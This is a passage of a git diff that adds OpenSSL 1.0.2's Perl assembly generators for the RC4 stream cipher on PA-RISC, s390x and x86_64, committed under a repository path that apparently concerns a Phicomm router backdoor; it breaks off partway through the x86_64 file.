+    elsif ($conv eq "w")        { $reg =~ s/%[er](.+)/%$1/;             }
+    elsif ($conv eq "d")        { $reg =~ s/%[er](.+)/%e$1/;            }
+    return $reg;
+}
+
+$code =~ s/(%[a-z0-9]+)#([bwd])/reg_part($1,$2)/gem;
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/pinsrw\s+\$0,/movd	/gm;
+
+$code =~ s/#md5#//gm	if ($md5);
+$code =~ s/#rc4#//gm	if ($rc4);
+
+print $code;
+
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-parisc.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-parisc.pl
new file mode 100644
index 0000000..ad7e656
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-parisc.pl
@@ -0,0 +1,314 @@
+#!/usr/bin/env perl
+
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+
+# RC4 for PA-RISC.
+
+# June 2009.
+#
+# Performance is 33% better than gcc 3.2 generated code on PA-7100LC.
+# For reference, [4x] unrolled loop is >40% faster than folded one.
+# It's possible to unroll loop 8 times on PA-RISC 2.0, but improvement
+# is believed to be not sufficient to justify the effort...
+#
+# Special thanks to polarhome.com for providing HP-UX account.
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+
+$flavour = shift;
+$output = shift;
+open STDOUT,">$output";
+
+if ($flavour =~ /64/) {
+	$LEVEL		="2.0W";
+	$SIZE_T		=8;
+	$FRAME_MARKER	=80;
+	$SAVED_RP	=16;
+	$PUSH		="std";
+	$PUSHMA		="std,ma";
+	$POP		="ldd";
+	$POPMB		="ldd,mb";
+} else {
+	$LEVEL		="1.0";
+	$SIZE_T		=4;
+	$FRAME_MARKER	=48;
+	$SAVED_RP	=20;
+	$PUSH		="stw";
+	$PUSHMA		="stwm";
+	$POP		="ldw";
+	$POPMB		="ldwm";
+}
+
+$FRAME=4*$SIZE_T+$FRAME_MARKER;	# 4 saved regs + frame marker
+				#                [+ argument transfer]
+$SZ=1;				# defaults to RC4_CHAR
+if (open CONF,"<${dir}../../opensslconf.h") {
+    while(<CONF>) {
+	if (m/#\s*define\s+RC4_INT\s+(.*)/) {
+	    $SZ = ($1=~/char$/) ? 1 : 4;
+	    last;
+	}
+    }
+    close CONF;
+}
+
+if ($SZ==1) {	# RC4_CHAR
+    $LD="ldb";
+    $LDX="ldbx";
+    $MKX="addl";
+    $ST="stb";
+} else {	# RC4_INT (~5% faster than RC4_CHAR on PA-7100LC)
+    $LD="ldw";
+    $LDX="ldwx,s";
+    $MKX="sh2addl";
+    $ST="stw";
+}
+
+$key="%r26";
+$len="%r25";
+$inp="%r24";
+$out="%r23";
+
+@XX=("%r19","%r20");
+@TX=("%r21","%r22");
+$YY="%r28";
+$TY="%r29";
+
+$acc="%r1";
+$ix="%r2";
+$iy="%r3";
+$dat0="%r4";
+$dat1="%r5";
+$rem="%r6";
+$mask="%r31";
+
+sub unrolledloopbody {
+for ($i=0;$i<4;$i++) {
+$code.=<<___;
+	ldo	1($XX[0]),$XX[1]
+	`sprintf("$LDX	%$TY(%$key),%$dat1") if ($i>0)`	
+	and	$mask,$XX[1],$XX[1]
+	$LDX	$YY($key),$TY
+	$MKX	$YY,$key,$ix
+	$LDX	$XX[1]($key),$TX[1]
+	$MKX	$XX[0],$key,$iy
+	$ST	$TX[0],0($ix)
+	comclr,<> $XX[1],$YY,%r0	; conditional
+	copy	$TX[0],$TX[1]		; move
+	`sprintf("%sdep	%$dat1,%d,8,%$acc",$i==1?"z":"",8*($i-1)+7) if ($i>0)`
+	$ST	$TY,0($iy)
+	addl	$TX[0],$TY,$TY
+	addl	$TX[1],$YY,$YY
+	and	$mask,$TY,$TY
+	and	$mask,$YY,$YY
+___
+push(@TX,shift(@TX)); push(@XX,shift(@XX));	# "rotate" registers
+} }
+
+sub foldedloop {
+my ($label,$count)=@_;
+$code.=<<___;
+$label
+	$MKX	$YY,$key,$iy
+	$LDX	$YY($key),$TY
+	$MKX	$XX[0],$key,$ix
+	$ST	$TX[0],0($iy)
+	ldo	1($XX[0]),$XX[0]
+	$ST	$TY,0($ix)
+	addl	$TX[0],$TY,$TY
+	ldbx	$inp($out),$dat1
+	and	$mask,$TY,$TY
+	and	$mask,$XX[0],$XX[0]
+	$LDX	$TY($key),$acc
+	$LDX	$XX[0]($key),$TX[0]
+	ldo	1($out),$out
+	xor	$dat1,$acc,$acc
+	addl	$TX[0],$YY,$YY
+	stb	$acc,-1($out)
+	addib,<> -1,$count,$label	; $count is always small
+	and	$mask,$YY,$YY
+___
+}
+
+$code=<<___;
+	.LEVEL	$LEVEL
+	.SPACE	\$TEXT\$
+	.SUBSPA	\$CODE\$,QUAD=0,ALIGN=8,ACCESS=0x2C,CODE_ONLY
+
+	.EXPORT	RC4,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR,ARGW3=GR
+RC4
+	.PROC
+	.CALLINFO	FRAME=`$FRAME-4*$SIZE_T`,NO_CALLS,SAVE_RP,ENTRY_GR=6
+	.ENTRY
+	$PUSH	%r2,-$SAVED_RP(%sp)	; standard prologue
+	$PUSHMA	%r3,$FRAME(%sp)
+	$PUSH	%r4,`-$FRAME+1*$SIZE_T`(%sp)
+	$PUSH	%r5,`-$FRAME+2*$SIZE_T`(%sp)
+	$PUSH	%r6,`-$FRAME+3*$SIZE_T`(%sp)
+
+	cmpib,*= 0,$len,L\$abort
+	sub	$inp,$out,$inp		; distance between $inp and $out
+
+	$LD	`0*$SZ`($key),$XX[0]
+	$LD	`1*$SZ`($key),$YY
+	ldo	`2*$SZ`($key),$key
+
+	ldi	0xff,$mask
+	ldi	3,$dat0		
+
+	ldo	1($XX[0]),$XX[0]	; warm up loop
+	and	$mask,$XX[0],$XX[0]
+	$LDX	$XX[0]($key),$TX[0]
+	addl	$TX[0],$YY,$YY
+	cmpib,*>>= 6,$len,L\$oop1	; is $len large enough to bother?
+	and	$mask,$YY,$YY
+
+	and,<>	$out,$dat0,$rem		; is $out aligned?
+	b	L\$alignedout
+	subi	4,$rem,$rem
+	sub	$len,$rem,$len
+___
+&foldedloop("L\$alignout",$rem);	# process till $out is aligned
+
+$code.=<<___;
+L\$alignedout				; $len is at least 4 here
+	and,<>	$inp,$dat0,$acc		; is $inp aligned?
+	b	L\$oop4
+	sub	$inp,$acc,$rem		; align $inp
+
+	sh3addl	$acc,%r0,$acc
+	subi	32,$acc,$acc
+	mtctl	$acc,%cr11		; load %sar with vshd align factor
+	ldwx	$rem($out),$dat0
+	ldo	4($rem),$rem
+L\$oop4misalignedinp
+___
+&unrolledloopbody();
+$code.=<<___;
+	$LDX	$TY($key),$ix
+	ldwx	$rem($out),$dat1
+	ldo	-4($len),$len
+	or	$ix,$acc,$acc		; last piece, no need to dep
+	vshd	$dat0,$dat1,$iy		; align data
+	copy	$dat1,$dat0
+	xor	$iy,$acc,$acc
+	stw	$acc,0($out)
+	cmpib,*<< 3,$len,L\$oop4misalignedinp
+	ldo	4($out),$out
+	cmpib,*= 0,$len,L\$done
+	nop
+	b	L\$oop1
+	nop
+
+	.ALIGN	8
+L\$oop4
+___
+&unrolledloopbody();
+$code.=<<___;
+	$LDX	$TY($key),$ix
+	ldwx	$inp($out),$dat0
+	ldo	-4($len),$len
+	or	$ix,$acc,$acc		; last piece, no need to dep
+	xor	$dat0,$acc,$acc
+	stw	$acc,0($out)
+	cmpib,*<< 3,$len,L\$oop4
+	ldo	4($out),$out
+	cmpib,*= 0,$len,L\$done
+	nop
+___
+&foldedloop("L\$oop1",$len);
+$code.=<<___;
+L\$done
+	$POP	`-$FRAME-$SAVED_RP`(%sp),%r2
+	ldo	-1($XX[0]),$XX[0]	; chill out loop
+	sub	$YY,$TX[0],$YY
+	and	$mask,$XX[0],$XX[0]
+	and	$mask,$YY,$YY
+	$ST	$XX[0],`-2*$SZ`($key)
+	$ST	$YY,`-1*$SZ`($key)
+	$POP	`-$FRAME+1*$SIZE_T`(%sp),%r4
+	$POP	`-$FRAME+2*$SIZE_T`(%sp),%r5
+	$POP	`-$FRAME+3*$SIZE_T`(%sp),%r6
+L\$abort
+	bv	(%r2)
+	.EXIT
+	$POPMB	-$FRAME(%sp),%r3
+	.PROCEND
+___
+
+$code.=<<___;
+
+	.EXPORT	private_RC4_set_key,ENTRY,ARGW0=GR,ARGW1=GR,ARGW2=GR
+	.ALIGN	8
+private_RC4_set_key
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	$ST	%r0,`0*$SZ`($key)
+	$ST	%r0,`1*$SZ`($key)
+	ldo	`2*$SZ`($key),$key
+	copy	%r0,@XX[0]
+L\$1st
+	$ST	@XX[0],0($key)
+	ldo	1(@XX[0]),@XX[0]
+	bb,>=	@XX[0],`31-8`,L\$1st	; @XX[0]<256
+	ldo	$SZ($key),$key
+
+	ldo	`-256*$SZ`($key),$key	; rewind $key
+	addl	$len,$inp,$inp		; $inp to point at the end
+	sub	%r0,$len,%r23		; inverse index
+	copy	%r0,@XX[0]
+	copy	%r0,@XX[1]
+	ldi	0xff,$mask
+
+L\$2nd
+	$LDX	@XX[0]($key),@TX[0]
+	ldbx	%r23($inp),@TX[1]
+	addi,nuv 1,%r23,%r23		; increment and conditional
+	sub	%r0,$len,%r23		; inverse index
+	addl	@TX[0],@XX[1],@XX[1]
+	addl	@TX[1],@XX[1],@XX[1]
+	and	$mask,@XX[1],@XX[1]
+	$MKX	@XX[0],$key,$TY
+	$LDX	@XX[1]($key),@TX[1]
+	$MKX	@XX[1],$key,$YY
+	ldo	1(@XX[0]),@XX[0]
+	$ST	@TX[0],0($YY)
+	bb,>=	@XX[0],`31-8`,L\$2nd	; @XX[0]<256
+	$ST	@TX[1],0($TY)
+
+	bv,n	(%r2)
+	.EXIT
+	nop
+	.PROCEND
+
+	.EXPORT	RC4_options,ENTRY
+	.ALIGN	8
+RC4_options
+	.PROC
+	.CALLINFO	NO_CALLS
+	.ENTRY
+	blr	%r0,%r28
+	ldi	3,%r1
+L\$pic
+	andcm	%r28,%r1,%r28
+	bv	(%r2)
+	.EXIT
+	ldo	L\$opts-L\$pic(%r28),%r28
+	.PROCEND
+	.ALIGN	8
+L\$opts
+	.STRINGZ "rc4(4x,`$SZ==1?"char":"int"`)"
+	.STRINGZ "RC4 for PA-RISC, CRYPTOGAMS by <appro\@openssl.org>"
+___
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+$code =~ s/cmpib,\*/comib,/gm	if ($SIZE_T==4);
+$code =~ s/\bbv\b/bve/gm	if ($SIZE_T==8);
+
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-s390x.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-s390x.pl
new file mode 100644
index 0000000..7528ece
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-s390x.pl
@@ -0,0 +1,234 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# February 2009
+#
+# Performance is 2x of gcc 3.4.6 on z10. Coding "secret" is to
+# "cluster" Address Generation Interlocks, so that one pipeline stall
+# resolves several dependencies.
+
+# November 2010.
+#
+# Adapt for -m31 build. If kernel supports what's called "highgprs"
+# feature on Linux [see /proc/cpuinfo], it's possible to use 64-bit
+# instructions and achieve "64-bit" performance even in 31-bit legacy
+# application context. The feature is not specific to any particular
+# processor, as long as it's "z-CPU". Latter implies that the code
+# remains z/Architecture specific. On z990 it was measured to perform
+# 50% better than code generated by gcc 4.3.
+
+$flavour = shift;
+
+if ($flavour =~ /3[12]/) {
+	$SIZE_T=4;
+	$g="";
+} else {
+	$SIZE_T=8;
+	$g="g";
+}
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$rp="%r14";
+$sp="%r15";
+$code=<<___;
+.text
+
+___
+
+# void RC4(RC4_KEY *key,size_t len,const void *inp,void *out)
+{
+$acc="%r0";
+$cnt="%r1";
+$key="%r2";
+$len="%r3";
+$inp="%r4";
+$out="%r5";
+
+@XX=("%r6","%r7");
+@TX=("%r8","%r9");
+$YY="%r10";
+$TY="%r11";
+
+$code.=<<___;
+.globl	RC4
+.type	RC4,\@function
+.align	64
+RC4:
+	stm${g}	%r6,%r11,6*$SIZE_T($sp)
+___
+$code.=<<___ if ($flavour =~ /3[12]/);
+	llgfr	$len,$len
+___
+$code.=<<___;
+	llgc	$XX[0],0($key)
+	llgc	$YY,1($key)
+	la	$XX[0],1($XX[0])
+	nill	$XX[0],0xff
+	srlg	$cnt,$len,3
+	ltgr	$cnt,$cnt
+	llgc	$TX[0],2($XX[0],$key)
+	jz	.Lshort
+	j	.Loop8
+
+.align	64
+.Loop8:
+___
+for ($i=0;$i<8;$i++) {
+$code.=<<___;
+	la	$YY,0($YY,$TX[0])	# $i
+	nill	$YY,255
+	la	$XX[1],1($XX[0])
+	nill	$XX[1],255
+___
+$code.=<<___ if ($i==1);
+	llgc	$acc,2($TY,$key)
+___
+$code.=<<___ if ($i>1);
+	sllg	$acc,$acc,8
+	ic	$acc,2($TY,$key)
+___
+$code.=<<___;
+	llgc	$TY,2($YY,$key)
+	stc	$TX[0],2($YY,$key)
+	llgc	$TX[1],2($XX[1],$key)
+	stc	$TY,2($XX[0],$key)
+	cr	$XX[1],$YY
+	jne	.Lcmov$i
+	la	$TX[1],0($TX[0])
+.Lcmov$i:
+	la	$TY,0($TY,$TX[0])
+	nill	$TY,255
+___
+push(@TX,shift(@TX)); push(@XX,shift(@XX));     # "rotate" registers
+}
+
+$code.=<<___;
+	lg	$TX[1],0($inp)
+	sllg	$acc,$acc,8
+	la	$inp,8($inp)
+	ic	$acc,2($TY,$key)
+	xgr	$acc,$TX[1]
+	stg	$acc,0($out)
+	la	$out,8($out)
+	brctg	$cnt,.Loop8
+
+.Lshort:
+	lghi	$acc,7
+	ngr	$len,$acc
+	jz	.Lexit
+	j	.Loop1
+
+.align	16
+.Loop1:
+	la	$YY,0($YY,$TX[0])
+	nill	$YY,255
+	llgc	$TY,2($YY,$key)
+	stc	$TX[0],2($YY,$key)
+	stc	$TY,2($XX[0],$key)
+	ar	$TY,$TX[0]
+	ahi	$XX[0],1
+	nill	$TY,255
+	nill	$XX[0],255
+	llgc	$acc,0($inp)
+	la	$inp,1($inp)
+	llgc	$TY,2($TY,$key)
+	llgc	$TX[0],2($XX[0],$key)
+	xr	$acc,$TY
+	stc	$acc,0($out)
+	la	$out,1($out)
+	brct	$len,.Loop1
+
+.Lexit:
+	ahi	$XX[0],-1
+	stc	$XX[0],0($key)
+	stc	$YY,1($key)
+	lm${g}	%r6,%r11,6*$SIZE_T($sp)
+	br	$rp
+.size	RC4,.-RC4
+.string	"RC4 for s390x, CRYPTOGAMS by <appro\@openssl.org>"
+
+___
+}
+
+# void RC4_set_key(RC4_KEY *key,unsigned int len,const void *inp)
+{
+$cnt="%r0";
+$idx="%r1";
+$key="%r2";
+$len="%r3";
+$inp="%r4";
+$acc="%r5";
+$dat="%r6";
+$ikey="%r7";
+$iinp="%r8";
+
+$code.=<<___;
+.globl	private_RC4_set_key
+.type	private_RC4_set_key,\@function
+.align	64
+private_RC4_set_key:
+	stm${g}	%r6,%r8,6*$SIZE_T($sp)
+	lhi	$cnt,256
+	la	$idx,0(%r0)
+	sth	$idx,0($key)
+.align	4
+.L1stloop:
+	stc	$idx,2($idx,$key)
+	la	$idx,1($idx)
+	brct	$cnt,.L1stloop
+
+	lghi	$ikey,-256
+	lr	$cnt,$len
+	la	$iinp,0(%r0)
+	la	$idx,0(%r0)
+.align	16
+.L2ndloop:
+	llgc	$acc,2+256($ikey,$key)
+	llgc	$dat,0($iinp,$inp)
+	la	$idx,0($idx,$acc)
+	la	$ikey,1($ikey)
+	la	$idx,0($idx,$dat)
+	nill	$idx,255
+	la	$iinp,1($iinp)
+	tml	$ikey,255
+	llgc	$dat,2($idx,$key)
+	stc	$dat,2+256-1($ikey,$key)
+	stc	$acc,2($idx,$key)
+	jz	.Ldone
+	brct	$cnt,.L2ndloop
+	lr	$cnt,$len
+	la	$iinp,0(%r0)
+	j	.L2ndloop
+.Ldone:
+	lm${g}	%r6,%r8,6*$SIZE_T($sp)
+	br	$rp
+.size	private_RC4_set_key,.-private_RC4_set_key
+
+___
+}
+
+# const char *RC4_options()
+$code.=<<___;
+.globl	RC4_options
+.type	RC4_options,\@function
+.align	16
+RC4_options:
+	larl	%r2,.Loptions
+	br	%r14
+.size	RC4_options,.-RC4_options
+.section	.rodata
+.Loptions:
+.align	8
+.string	"rc4(8x,char)"
+___
+
+print $code;
+close STDOUT;	# force flush
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-x86_64.pl
new file mode 100755
index 0000000..75750db
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/rc4/asm/rc4-x86_64.pl
@@ -0,0 +1,677 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@fy.chalmers.se> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# July 2004
+#
+# 2.22x RC4 tune-up:-) It should be noted though that my hand [as in
+# "hand-coded assembler"] doesn't stand for the whole improvement
+# coefficient. It turned out that eliminating RC4_CHAR from config
+# line results in ~40% improvement (yes, even for C implementation).
+# Presumably it has everything to do with AMD cache architecture and
+# RAW or whatever penalties. Once again! The module *requires* config
+# line *without* RC4_CHAR! As for coding "secret," I bet on partial
+# register arithmetics. For example instead of 'inc %r8; and $255,%r8'
+# I simply 'inc %r8b'. Even though optimization manual discourages
+# to operate on partial registers, it turned out to be the best bet.
+# At least for AMD... How IA32E would perform remains to be seen...
+
+# November 2004
+#
+# As was shown by Marc Bevand reordering of couple of load operations
+# results in even higher performance gain of 3.3x:-) At least on
+# Opteron... For reference, 1x in this case is RC4_CHAR C-code
+# compiled with gcc 3.3.2, which performs at ~54MBps per 1GHz clock.
+# Latter means that if you want to *estimate* what to expect from
+# *your* Opteron, then multiply 54 by 3.3 and clock frequency in GHz.
+
+# November 2004
+#
+# Intel P4 EM64T core was found to run the AMD64 code really slow...
+# The only way to achieve comparable performance on P4 was to keep
+# RC4_CHAR. Kind of ironic, huh? As it's apparently impossible to
+# compose blended code, which would perform even within 30% marginal
+# on either AMD and Intel platforms, I implement both cases. See
+# rc4_skey.c for further details...
+
+# April 2005
+#
+# P4 EM64T core appears to be "allergic" to 64-bit inc/dec. Replacing 
+# those with add/sub results in 50% performance improvement of folded
+# loop...
+
+# May 2005
+#
+# As was shown by Zou Nanhai loop unrolling can improve Intel EM64T
+# performance by >30% [unlike P4 32-bit case that is]. But this is
+# provided that loads are reordered even more aggressively! Both code
+# pathes, AMD64 and EM64T, reorder loads in essentially same manner
+# as my IA-64 implementation. On Opteron this resulted in modest 5%
+# improvement [I had to test it], while final Intel P4 performance
+# achieves respectful 432MBps on 2.8GHz processor now. For reference.
+# If executed on Xeon, current RC4_CHAR code-path is 2.7x faster than
+# RC4_INT code-path. While if executed on Opteron, it's only 25%
+# slower than the RC4_INT one [meaning that if CPU µ-arch detection
+# is not implemented, then this final RC4_CHAR code-path should be
+# preferred, as it provides better *all-round* performance].
+
+# March 2007
+#
+# Intel Core2 was observed to perform poorly on both code paths:-( It
+# apparently suffers from some kind of partial register stall, which
+# occurs in 64-bit mode only [as virtually identical 32-bit loop was
+# observed to outperform 64-bit one by almost 50%]. Adding two movzb to
+# cloop1 boosts its performance by 80%! This loop appears to be optimal
+# fit for Core2 and therefore the code was modified to skip cloop8 on
+# this CPU.
+
+# May 2010
+#
+# Intel Westmere was observed to perform suboptimally. Adding yet
+# another movzb to cloop1 improved performance by almost 50%! Core2
+# performance is improved too, but nominally...
+
+# May 2011
+#
+# The only code path that was not modified is P4-specific one. Non-P4
+# Intel code path optimization is heavily based on submission by Maxim
+# Perminov, Maxim Locktyukhin and Jim Guilford of Intel. I've used
+# some of the ideas even in attempt to optmize the original RC4_INT
+# code path... Current performance in cycles per processed byte (less
+# is better) and improvement coefficients relative to previous
+# version of this module are:
+#
+# Opteron	5.3/+0%(*)
+# P4		6.5
+# Core2		6.2/+15%(**)
+# Westmere	4.2/+60%
+# Sandy Bridge	4.2/+120%
+# Atom		9.3/+80%
+#
+# (*)	But corresponding loop has less instructions, which should have
+#	positive effect on upcoming Bulldozer, which has one less ALU.
+#	For reference, Intel code runs at 6.8 cpb rate on Opteron.
+# (**)	Note that Core2 result is ~15% lower than corresponding result
+#	for 32-bit code, meaning that it's possible to improve it,
+#	but more than likely at the cost of the others (see rc4-586.pl
+#	to get the idea)...
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$dat="%rdi";	    # arg1
+$len="%rsi";	    # arg2
+$inp="%rdx";	    # arg3
+$out="%rcx";	    # arg4
+
+{
+$code=<<___;
+.text
+.extern	OPENSSL_ia32cap_P
+
+.globl	RC4
+.type	RC4,\@function,4
+.align	16
+RC4:	or	$len,$len
+	jne	.Lentry
+	ret
+.Lentry:
+	push	%rbx
+	push	%r12
+	push	%r13
+.Lprologue:
+	mov	$len,%r11
+	mov	$inp,%r12
+	mov	$out,%r13
+___
+my $len="%r11";		# reassign input arguments
+my $inp="%r12";
+my $out="%r13";
+
+my @XX=("%r10","%rsi");
+my @TX=("%rax","%rbx");
+my $YY="%rcx";
+my $TY="%rdx";
+
+$code.=<<___;
+	xor	$XX[0],$XX[0]
+	xor	$YY,$YY
+
+	lea	8($dat),$dat
+	mov	-8($dat),$XX[0]#b
+	mov	-4($dat),$YY#b
+	cmpl	\$-1,256($dat)
+	je	.LRC4_CHAR
+	mov	OPENSSL_ia32cap_P(%rip),%r8d
+	xor	$TX[1],$TX[1]
+	inc	$XX[0]#b
+	sub	$XX[0],$TX[1]
+	sub	$inp,$out
+	movl	($dat,$XX[0],4),$TX[0]#d
+	test	\$-16,$len
+	jz	.Lloop1
+	bt	\$30,%r8d	# Intel CPU?
+	jc	.Lintel
+	and	\$7,$TX[1]
+	lea	1($XX[0]),$XX[1]
+	jz	.Loop8
+	sub	$TX[1],$len
+.Loop8_warmup:
+	add	$TX[0]#b,$YY#b
+	movl	($dat,$YY,4),$TY#d
+	movl	$TX[0]#d,($dat,$YY,4)
+	movl	$TY#d,($dat,$XX[0],4)
+	add	$TY#b,$TX[0]#b
+	inc	$XX[0]#b
+	movl	($dat,$TX[0],4),$TY#d
+	movl	($dat,$XX[0],4),$TX[0]#d
+	xorb	($inp),$TY#b
+	movb	$TY#b,($out,$inp)
+	lea	1($inp),$inp
+	dec	$TX[1]
+	jnz	.Loop8_warmup
+
+	lea	1($XX[0]),$XX[1]
+	jmp	.Loop8
+.align	16
+.Loop8:
+___
+for ($i=0;$i<8;$i++) {
+$code.=<<___ if ($i==7);
+	add	\$8,$XX[1]#b
+___
+$code.=<<___;
+	add	$TX[0]#b,$YY#b
+	movl	($dat,$YY,4),$TY#d
+	movl	$TX[0]#d,($dat,$YY,4)
+	movl	`4*($i==7?-1:$i)`($dat,$XX[1],4),$TX[1]#d
+	ror	\$8,%r8				# ror is redundant when $i=0
+	movl	$TY#d,4*$i($dat,$XX[0],4)
+	add	$TX[0]#b,$TY#b
+	movb	($dat,$TY,4),%r8b
+___
+push(@TX,shift(@TX)); #push(@XX,shift(@XX));	# "rotate" registers
+}
+$code.=<<___;
+	add	\$8,$XX[0]#b
+	ror	\$8,%r8
+	sub	\$8,$len
+
+	xor	($inp),%r8
+	mov	%r8,($out,$inp)
+	lea	8($inp),$inp
+
+	test	\$-8,$len
+	jnz	.Loop8
+	cmp	\$0,$len
+	jne	.Lloop1
+	jmp	.Lexit
+
+.align	16
+.Lintel:
+	test	\$-32,$len
+	jz	.Lloop1
+	and	\$15,$TX[1]
+	jz	.Loop16_is_hot
+	sub	$TX[1],$len
+.Loop16_warmup:
+	add	$TX[0]#b,$YY#b
+	movl	($dat,$YY,4),$TY#d
+	movl	$TX[0]#d,($dat,$YY,4)
+	movl	$TY#d,($dat,$XX[0],4)
+	add	$TY#b,$TX[0]#b
+	inc	$XX[0]#b
+	movl	($dat,$TX[0],4),$TY#d
+	movl	($dat,$XX[0],4),$TX[0]#d
+	xorb	($inp),$TY#b
+	movb	$TY#b,($out,$inp)
+	lea	1($inp),$inp
+	dec	$TX[1]
+	jnz	.Loop16_warmup
+
+	mov	$YY,$TX[1]
+	xor	$YY,$YY
+	mov	$TX[1]#b,$YY#b
+
+.Loop16_is_hot:
+	lea	($dat,$XX[0],4),$XX[1]
+___
+sub RC4_loop {
+  my $i=shift;
+  my $j=$i<0?0:$i;
+  my $xmm="%xmm".($j&1);
+
+    $code.="	add	\$16,$XX[0]#b\n"		if ($i==15);
+    $code.="	movdqu	($inp),%xmm2\n"			if ($i==15);
+    $code.="	add	$TX[0]#b,$YY#b\n"		if ($i<=0);
+    $code.="	movl	($dat,$YY,4),$TY#d\n";
+    $code.="	pxor	%xmm0,%xmm2\n"			if ($i==0);
+    $code.="	psllq	\$8,%xmm1\n"			if ($i==0);
+    $code.="	pxor	$xmm,$xmm\n"			if ($i<=1);
+    $code.="	movl	$TX[0]#d,($dat,$YY,4)\n";
+    $code.="	add	$TY#b,$TX[0]#b\n";
+    $code.="	movl	`4*($j+1)`($XX[1]),$TX[1]#d\n"	if ($i<15);
+    $code.="	movz	$TX[0]#b,$TX[0]#d\n";
+    $code.="	movl	$TY#d,4*$j($XX[1])\n";
+    $code.="	pxor	%xmm1,%xmm2\n"			if ($i==0);
+    $code.="	lea	($dat,$XX[0],4),$XX[1]\n"	if ($i==15);
+    $code.="	add	$TX[1]#b,$YY#b\n"		if ($i<15);
+    $code.="	pinsrw	\$`($j>>1)&7`,($dat,$TX[0],4),$xmm\n";
+    $code.="	movdqu	%xmm2,($out,$inp)\n"		if ($i==0);
+    $code.="	lea	16($inp),$inp\n"		if ($i==0);
+    $code.="	movl	($XX[1]),$TX[1]#d\n"		if ($i==15);
+}
+	RC4_loop(-1);
+$code.=<<___;
+	jmp	.Loop16_enter
+.align	16
+.Loop16:
+___
+
+for ($i=0;$i<16;$i++) {
+    $code.=".Loop16_enter:\n"		if ($i==1);
+	RC4_loop($i);
+	push(@TX,shift(@TX)); 		# "rotate" registers
+}
+$code.=<<___;
+	mov	$YY,$TX[1]
+	xor	$YY,$YY			# keyword to partial register
+	sub	\$16,$len
+	mov	$TX[1]#b,$YY#b
+	test	\$-16,$len
+	jnz	.Loop16
+
+	psllq	\$8,%xmm1
+	pxor	%xmm0,%xmm2
+	pxor	%xmm1,%xmm2
+	movdqu	%xmm2,($out,$inp)
+	lea	16($inp),$inp
+
+	cmp	\$0,$len
+	jne	.Lloop1
+	jmp	.Lexit
+
+.align	16
+.Lloop1:
+	add	$TX[0]#b,$YY#b
+	movl	($dat,$YY,4),$TY#d
+	movl	$TX[0]#d,($dat,$YY,4)
+	movl	$TY#d,($dat,$XX[0],4)
+	add	$TY#b,$TX[0]#b
+	inc	$XX[0]#b
+	movl	($dat,$TX[0],4),$TY#d
+	movl	($dat,$XX[0],4),$TX[0]#d
+	xorb	($inp),$TY#b
+	movb	$TY#b,($out,$inp)
+	lea	1($inp),$inp
+	dec	$len
+	jnz	.Lloop1
+	jmp	.Lexit
+
+.align	16
+.LRC4_CHAR:
+	add	\$1,$XX[0]#b
+	movzb	($dat,$XX[0]),$TX[0]#d
+	test	\$-8,$len
+	jz	.Lcloop1
+	jmp	.Lcloop8
+.align	16
+.Lcloop8:
+	mov	($inp),%r8d
+	mov	4($inp),%r9d
+___
+# unroll 2x4-wise, because 64-bit rotates kill Intel P4...
+for ($i=0;$i<4;$i++) {
+$code.=<<___;
+	add	$TX[0]#b,$YY#b
+	lea	1($XX[0]),$XX[1]
+	movzb	($dat,$YY),$TY#d
+	movzb	$XX[1]#b,$XX[1]#d
+	movzb	($dat,$XX[1]),$TX[1]#d
+	movb	$TX[0]#b,($dat,$YY)
+	cmp	$XX[1],$YY
+	movb	$TY#b,($dat,$XX[0])
+	jne	.Lcmov$i			# Intel cmov is sloooow...
+	mov	$TX[0],$TX[1]
+.Lcmov$i:
+	add	$TX[0]#b,$TY#b
+	xor	($dat,$TY),%r8b
+	ror	\$8,%r8d
+___
